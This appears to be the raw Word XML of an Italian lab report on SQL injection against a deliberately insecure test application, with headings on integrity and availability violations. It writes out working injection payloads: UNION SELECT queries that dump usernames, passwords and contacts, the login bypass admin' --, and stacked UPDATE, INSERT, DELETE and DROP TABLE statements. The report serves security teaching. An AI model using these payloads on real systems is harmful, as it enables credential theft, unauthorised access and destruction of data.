          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3EB3742C" w14:textId="36591B01" w:rsidR="00406A2B" w:rsidRPr="00342751" w:rsidRDefault="00342751" w:rsidP="00342751">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:line="216" w:lineRule="auto"/>
        <w:ind w:left="2160"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr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' UNION SELECT NULL, GROUP_</w:t>
      </w:r>
      <w:proofErr w:type="gram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CONCAT(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gram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column_name</w:t>
      </w:r>
      <w:proofErr w:type="spell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), NULL FROM </w:t>
      </w:r>
      <w:proofErr w:type="spell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information_</w:t>
      </w:r>
      <w:proofErr w:type="gram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schema.columns</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gram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 WHERE </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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table_name</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00342751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='</w:t>
      </w:r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contacts' </w:t>
      </w:r>
      <w:r w:rsidRPr="00342751">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="808080"/>
          <w:highlight w:val="lightGray"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>AND</w:t>
      </w:r>
      <w:r w:rsidRPr="00342751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proofErr w:type="spellStart"/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table_schema</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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=</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00342751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DATABASE</w:t>
      </w:r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(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00342751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)</w:t>
      </w:r>
      <w:r w:rsidRPr="00342751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 -</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B836DA9" w14:textId="77975C39" w:rsidR="00DC6292" w:rsidRDefault="004038D7" w:rsidP="00DC6292">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:line="216" w:lineRule="auto"/>
        <w:ind w:left="1440"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve">Possiamo </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve">trovare i nomi delle colonne delle tabelle users e </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>contacts</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6EB4E9A1" w14:textId="18EEC7BE" w:rsidR="00DC6292" w:rsidRPr="00DC6292" w:rsidRDefault="00451A64" w:rsidP="00451A64">
      <w:pPr>
        <w:spacing w:line="216" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00451A64">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1B717434" wp14:editId="65445882">
            <wp:extent cx="5368637" cy="2313919"/>
            <wp:effectExtent l="0" t="0" r="3810" b="0"/>
            <wp:docPr id="203704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40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777" cy="23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1A32" w14:textId="77777777" w:rsidR="00342751" w:rsidRDefault="00BC44B5" w:rsidP="00342751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Sapendo i nomi delle colonne, con i comandi</w:t>
      </w:r>
      <w:r w:rsidR="004038D7">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71C86343" w14:textId="77777777" w:rsidR="00886DC6" w:rsidRPr="00886DC6" w:rsidRDefault="00342751" w:rsidP="00886DC6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:line="216" w:lineRule="auto"/>
        <w:ind w:left="1440" w:firstLine="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="008200"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr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' </w:t>
      </w:r>
      <w:r w:rsidRPr="00886DC6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UNION</w:t>
      </w:r>
      <w:r w:rsidRPr="00886DC6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886DC6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SELECT</w:t>
      </w:r>
      <w:r w:rsidRPr="00886DC6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id, username, </w:t>
      </w:r>
      <w:r w:rsidRPr="00886DC6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password</w:t>
      </w:r>
      <w:r w:rsidRPr="00886DC6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886DC6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FROM</w:t>
      </w:r>
      <w:r w:rsidRPr="00886DC6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users</w:t>
      </w:r>
      <w:r w:rsidRPr="00886DC6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 -</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F91C409" w14:textId="77777777" w:rsidR="00886DC6" w:rsidRPr="00886DC6" w:rsidRDefault="00886DC6" w:rsidP="00886DC6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:line="216" w:lineRule="auto"/>
        <w:ind w:left="1440" w:firstLine="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="008200"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="69175A9C" w14:textId="76EC9563" w:rsidR="00342751" w:rsidRPr="00886DC6" w:rsidRDefault="00886DC6" w:rsidP="00886DC6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:line="216" w:lineRule="auto"/>
        <w:ind w:left="1440" w:firstLine="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr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' </w:t>
      </w:r>
      <w:r w:rsidRPr="00886DC6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UNION</w:t>
      </w:r>
      <w:r w:rsidRPr="00886DC6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886DC6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SELECT</w:t>
      </w:r>
      <w:r w:rsidRPr="00886DC6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proofErr w:type="spellStart"/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user_id</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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telefono</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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, email </w:t>
      </w:r>
      <w:r w:rsidRPr="00886DC6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FROM</w:t>
      </w:r>
      <w:r w:rsidRPr="00886DC6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contacts</w:t>
      </w:r>
      <w:r w:rsidRPr="00886DC6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 -</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D6F456C" w14:textId="03ED716A" w:rsidR="004038D7" w:rsidRDefault="004038D7" w:rsidP="004038D7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:line="216" w:lineRule="auto"/>
        <w:ind w:left="1440"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve">Possiamo </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>stampare i dati delle</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> tabelle users e </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>contacts</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="08E12693" w14:textId="4D704820" w:rsidR="006713B8" w:rsidRPr="006713B8" w:rsidRDefault="006713B8" w:rsidP="006713B8">
      <w:pPr>
        <w:spacing w:line="216" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006713B8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="678BBFAD" wp14:editId="030CC0C7">
            <wp:extent cx="5409397" cy="3602182"/>
            <wp:effectExtent l="0" t="0" r="1270" b="0"/>
            <wp:docPr id="85968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991" cy="361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7061" w14:textId="77777777" w:rsidR="00886DC6" w:rsidRDefault="00BC44B5" w:rsidP="00886DC6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lastRenderedPageBreak/>
        <w:t>Vedendo che esiste l’acc</w:t>
      </w:r>
      <w:r w:rsidR="00AC4292">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>ount “admin” possiamo usare il comando</w:t>
      </w:r>
      <w:r w:rsidR="004038D7">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B13960A" w14:textId="7A57F78A" w:rsidR="004038D7" w:rsidRPr="00886DC6" w:rsidRDefault="00886DC6" w:rsidP="00886DC6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:line="216" w:lineRule="auto"/>
        <w:ind w:left="1440" w:firstLine="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00886DC6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</w:rPr>
        <w:t xml:space="preserve">admin' </w:t>
      </w:r>
      <w:r w:rsidRPr="00886DC6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</w:rPr>
        <w:t>--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4209ACAB" w14:textId="3EB100B0" w:rsidR="004038D7" w:rsidRDefault="004038D7" w:rsidP="004038D7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:line="216" w:lineRule="auto"/>
        <w:ind w:left="1440"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve">In questo modo possiamo </w:t>
      </w:r>
      <w:r w:rsidR="00EE27E5">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>forzare</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve"> l’</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>accesso con l’account “admin” senza il bisogno della password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35F59BE3" w14:textId="7B008895" w:rsidR="006713B8" w:rsidRPr="006713B8" w:rsidRDefault="006713B8" w:rsidP="006713B8">
      <w:pPr>
        <w:spacing w:line="216" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006713B8">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5E84BAE8" wp14:editId="3C309EE9">
            <wp:extent cx="5444837" cy="930741"/>
            <wp:effectExtent l="0" t="0" r="3810" b="3175"/>
            <wp:docPr id="5750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5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3932" cy="93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80D9" w14:textId="77777777" w:rsidR="00F8039B" w:rsidRDefault="00AC4292" w:rsidP="00F8039B">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="22" w:name="_Toc232079417"/>
      <w:r>
        <w:t>Modificare il contenuto delle tabelle (Integrità violata)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="22"/>
    </w:p>
    <w:p w14:paraId="2BC86A14" w14:textId="4B10EAF5" w:rsidR="00AC4292" w:rsidRDefault="00F8039B" w:rsidP="00F8039B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>P</w:t>
      </w:r>
      <w:r w:rsidR="00AC4292">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>ossiamo provare a modificare il contenuto delle tabelle, ad esempio:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="119F4DF8" w14:textId="77777777" w:rsidR="009C23DD" w:rsidRDefault="00AC4292" w:rsidP="009C23DD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Modificando le informazioni di un account:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64B24C7C" w14:textId="527CE11A" w:rsidR="004038D7" w:rsidRPr="009C23DD" w:rsidRDefault="009C23DD" w:rsidP="009C23DD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:line="216" w:lineRule="auto"/>
        <w:ind w:left="2160"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr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'; UPDATE </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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unsecure_users</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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 SET password='</w:t>
      </w:r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123456</w:t>
      </w:r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' WHERE username='</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/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anna.neri</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/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'; </w:t>
      </w:r>
      <w:r w:rsidRPr="009C23DD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SELECT</w:t>
      </w:r>
      <w:r w:rsidRPr="009C23DD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* </w:t>
      </w:r>
      <w:r w:rsidRPr="009C23DD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FROM</w:t>
      </w:r>
      <w:r w:rsidRPr="009C23DD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proofErr w:type="spellStart"/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unsecure_users</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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; </w:t>
      </w:r>
      <w:r w:rsidRPr="009C23DD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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="547F20B9" w14:textId="61C87BEB" w:rsidR="004038D7" w:rsidRDefault="004038D7" w:rsidP="004038D7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:line="216" w:lineRule="auto"/>
        <w:ind w:left="1440"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve">In questo modo abbiamo </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>modificato la password dell’utente “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>anna.neri</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve">” </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>in “123456”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51CBDFD9" w14:textId="66D65883" w:rsidR="00CF6081" w:rsidRPr="00CF6081" w:rsidRDefault="009F7FF7" w:rsidP="00CF6081">
      <w:pPr>
        <w:spacing w:line="216" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009F7FF7">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="480E9A8B" wp14:editId="2A95EDD7">
            <wp:extent cx="5437909" cy="820722"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="19588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49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9122" cy="8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F3D7" w14:textId="77777777" w:rsidR="009C23DD" w:rsidRDefault="00AC4292" w:rsidP="009C23DD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Aggiungendo un nuovo utente senza doverlo registrare</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="301FBD10" w14:textId="78478050" w:rsidR="004038D7" w:rsidRPr="009C23DD" w:rsidRDefault="009C23DD" w:rsidP="009C23DD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:line="216" w:lineRule="auto"/>
        <w:ind w:left="2160"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr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'; INSERT INTO </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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unsecure_users</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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 xml:space="preserve"> (username, password) VALUES ('</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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testuser</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009C23DD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', '</w:t>
      </w:r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test1234!'); </w:t>
      </w:r>
      <w:r w:rsidRPr="009C23DD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SELECT</w:t>
      </w:r>
      <w:r w:rsidRPr="009C23DD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* </w:t>
      </w:r>
      <w:r w:rsidRPr="009C23DD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FROM</w:t>
      </w:r>
      <w:r w:rsidRPr="009C23DD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proofErr w:type="spellStart"/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unsecure_users</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009C23DD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; </w:t>
      </w:r>
      <w:r w:rsidRPr="009C23DD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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E54F100" w14:textId="4D7EFE5C" w:rsidR="004038D7" w:rsidRDefault="004038D7" w:rsidP="004038D7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:line="216" w:lineRule="auto"/>
        <w:ind w:left="1440"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>Creando così un nuovo utente “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>testuser</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="009D0C24">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve">e successivamente </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve">potremmo </w:t>
      </w:r>
      <w:r w:rsidR="009D0C24">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>anche elevare i suoi permessi ad amministrator</w:t>
      </w:r>
      <w:r w:rsidR="00CF6081">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>e</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ABEFDE9" w14:textId="01EABF2C" w:rsidR="009F7FF7" w:rsidRPr="009F7FF7" w:rsidRDefault="009F7FF7" w:rsidP="009F7FF7">
      <w:pPr>
        <w:spacing w:line="216" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009F7FF7">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="25B4ADCA" wp14:editId="14789C8A">
            <wp:extent cx="5334000" cy="832203"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:docPr id="15954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6784" cy="8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8D7D" w14:textId="54C50495" w:rsidR="00CF6081" w:rsidRPr="00CF6081" w:rsidRDefault="00CF6081" w:rsidP="00CF6081">
      <w:pPr>
        <w:spacing w:line="216" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F2B3DF9" w14:textId="09ED3401" w:rsidR="00AC4292" w:rsidRDefault="00AC4292" w:rsidP="00F8039B">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="23" w:name="_Toc232079418"/>
      <w:r>
        <w:t>Cancellare una o più tabelle e il loro contenuto (Disponibilità e Integrità violata)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="23"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="148985FF" w14:textId="77777777" w:rsidR="004D35F7" w:rsidRDefault="001C6E6E" w:rsidP="004D35F7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Con il comando:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54021CA8" w14:textId="5CDFF60C" w:rsidR="001C6E6E" w:rsidRPr="004D35F7" w:rsidRDefault="004D35F7" w:rsidP="004D35F7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:line="216" w:lineRule="auto"/>
        <w:ind w:left="2160"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004D35F7">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0000FF"/>
          <w:highlight w:val="lightGray"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>'; DELETE FROM users WHERE username='</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="004D35F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>mario.rossi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="004D35F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'; </w:t>
      </w:r>
      <w:r w:rsidRPr="004D35F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SELECT</w:t>
      </w:r>
      <w:r w:rsidRPr="004D35F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4D35F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* </w:t>
      </w:r>
      <w:r w:rsidRPr="004D35F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FROM</w:t>
      </w:r>
      <w:r w:rsidRPr="004D35F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4D35F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users; </w:t>
      </w:r>
      <w:r w:rsidRPr="004D35F7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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0082B9E7" w14:textId="70124B12" w:rsidR="003346B6" w:rsidRDefault="001C6E6E" w:rsidP="001C6E6E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:line="216" w:lineRule="auto"/>
        <w:ind w:left="1440"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve">Possiamo vedere come abbiamo </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>eliminato l’utente “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>mario.rossi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve">” </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>e i suoi dati dal DB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33197535" w14:textId="74BA9FB1" w:rsidR="00383BC5" w:rsidRPr="00383BC5" w:rsidRDefault="00383BC5" w:rsidP="00383BC5">
      <w:pPr>
        <w:spacing w:line="216" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00383BC5">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="368D32A7" wp14:editId="43DD54DD">
            <wp:extent cx="5357136" cy="2001981"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="11075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98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9088" cy="201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538E" w14:textId="77777777" w:rsidR="004D35F7" w:rsidRDefault="001C6E6E" w:rsidP="004D35F7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:spacing w:line="216" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>Con il comando:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E4F5631" w14:textId="03062818" w:rsidR="001C6E6E" w:rsidRPr="004D35F7" w:rsidRDefault="004D35F7" w:rsidP="004D35F7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:line="216" w:lineRule="auto"/>
        <w:ind w:left="1440" w:firstLine="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004D35F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'; </w:t>
      </w:r>
      <w:r w:rsidRPr="004D35F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DROP</w:t>
      </w:r>
      <w:r w:rsidRPr="004D35F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4D35F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TABLE</w:t>
      </w:r>
      <w:r w:rsidRPr="004D35F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4D35F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contacts; </w:t>
      </w:r>
      <w:r w:rsidRPr="004D35F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DROP</w:t>
      </w:r>
      <w:r w:rsidRPr="004D35F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4D35F7">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="006699"/>
          <w:highlight w:val="lightGray"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>TABLE</w:t>
      </w:r>
      <w:r w:rsidRPr="004D35F7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="lightGray"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="004D35F7">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:highlight w:val="lightGray"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">users; </w:t>
      </w:r>
      <w:r w:rsidRPr="004D35F7">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="008200"/>
          <w:highlight w:val="lightGray"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>--</w:t>
      </w:r>
    </w:p>
